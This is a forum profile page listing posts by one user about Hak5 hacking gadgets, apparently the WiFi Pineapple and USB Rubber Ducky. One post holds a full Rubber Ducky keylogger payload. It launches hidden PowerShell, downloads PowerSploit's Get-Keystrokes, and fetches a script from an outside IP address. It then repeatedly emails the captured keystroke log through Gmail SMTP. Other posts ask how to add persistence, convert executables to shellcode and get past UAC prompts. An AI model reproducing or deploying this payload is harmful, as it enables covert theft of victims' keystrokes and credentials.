Jump to content

henna3

Active Members
  • Posts

    10
  • Joined

  • Last visited

Everything posted by henna3

  1. Hi, and thanks for the update. I cant get this module to install its Dependencies on my Pineapple Nano. I click install, it says installing and then just goes back to the green "install" button. I have tried to change permissions but i am still stuck. Hope to get some help, thanks
  2. For some reason the file wont start at startup. I have tested with notepad.exe and another native exe file. Is there a reason for this? Thanks
  3. You have one for the usb rubber ducky aswell? Hehe
  4. DELAY 2000 GUI r DELAY 500 STRING powershell -WindowStyle hidden ENTER DELAY 1500 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1') ENTER DELAY 400 STRING Get-Keystrokes -LogPath $env:temp\key.log ENTER DELAY 200 GUI r DELAY 300 STRING powershell -WindowStyle hidden IEX (New-Object Net.WebClient).DownloadString('http://101.131.71.81/mail.ps1') ENTER $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('myemail', 'mypassword') $ReportEmail = New-Object System.Net.Mail.MailMessage $ReportEmail.From = 'myemail' $ReportEmail.To.Add('myemail') $ReportEmail.Subject = 'Keylogger - ' + [System.Net.Dns]::GetHostByName(($env:computerName)).HostName while(1){$ReportEmail.Attachments.Add("$ENV:temp\key.log");$SMTPInfo.Send($ReportEmail);sleep 360} I have absolutely no idea if this will fix the problem for you, but it worked for me. Simply changed the key.txt to key.log Hope it works for you too!
  5. Everything works except the persistence. Cant get that to work for some reason.. Do you know how to fix this? Nice script though chaz!!
  6. Nice script man!, quick question Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? Thanks!
  7. I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround? Amazing twin duck payload! Thanks.
×
×
  • Create New...